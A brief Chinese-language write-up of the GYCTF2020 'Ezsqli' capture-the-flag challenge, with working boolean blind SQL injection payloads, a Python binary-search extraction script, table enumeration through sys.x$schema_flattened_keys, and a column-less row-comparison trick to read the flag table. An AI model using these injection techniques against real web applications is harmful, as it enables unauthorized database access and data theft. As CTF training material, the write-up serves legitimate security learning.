[GYCTF2020]Ezsqli1

 

有相应的回显

 

可以对其进行盲注

长为507的是被过滤的

输入1&&(ascii(substr(database(),1,1))>32)#

成功回显则可用来盲注

借鉴大佬脚本

import requests
import time
url = 'http://a713b075-e461-480d-82a8-36c99d85f52e.node3.buuoj.cn'
i = 0
flag = ''
while True:
    i += 1
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        #print(begin, tmp, end)
        time.sleep(0.1)
        payload = {"id":"1&&(ascii(substr(database(),%d,1))>%d)#" % (i, tmp)}
　　　　 #payload = {"id":"1&&(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(sys.x$schema_flattened_keys)where(TABLE_SCHEMA=database())),%d,1))>%d)#" % (i, tmp)}

        r = requests.post(url,data=payload)
        if 'Nu1L' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

爆表

字段爆破用无列名爆破

1&&((select 1,'a') < (select * from f1ag_1s_h3r3_hhhhh))

 

 比较首字符<就返回1反之返回0

前面select的字段有两个和后面的对应

payload = {"id":"1&&((select 1,'{}') < (select * from f1ag_1s_h3r3_hhhhh))".format(flag+chr(tmp))}

构建相应的脚本可爆出flag

这题好像每个人的flag都不一样有点骚